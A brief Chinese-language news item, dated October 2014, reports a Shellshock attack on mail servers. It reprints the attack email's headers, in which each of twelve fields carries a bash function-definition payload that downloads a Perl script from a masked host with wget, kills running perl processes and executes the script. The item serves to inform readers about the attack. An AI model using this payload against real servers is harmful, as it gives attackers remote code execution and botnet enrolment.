![](https://img.laitimes.com/img/_0nNw4CM6IyYiwiM6ICdiwiInBnaugzd5UDMydXbphHMwhzMiVXMwYzMzEzLcljMvwFMxQTMwIzLc1WdixWYvwFduVWboNWY0RXYvwVY0FGZvwVZt5CevJWcu42Y4VnbpxWLuR2Lc9CX6MHc0RHaiojIsJye.jpg)
安全研究人員報告,攻擊者向郵件伺服器發送特定的消息頭字段,誘騙伺服器執行一個 perl腳本,成為僵屍網絡的一部分。郵件消息頭的構成是:
shellshock spam october 2014 (ip位址已隐藏)
===
to:() { :; };wget -o /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
references:() { :; };wget -o /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
cc:() { :; };wget -o /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
from:() { :; };wget -o /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
subject:() { :; };wget -o /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
date:() { :; };wget -o /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
message-id:() { :; };wget -o /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
comments:() { :; };wget -o /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
keywords:() { :; };wget -o /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
resent-date:() { :; };wget -o /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
resent-from:() { :; };wget -o /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
resent-sender:() { :; };wget -o /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
原文釋出時間:2014-10-29
本文來自雲栖合作夥伴“linux中國”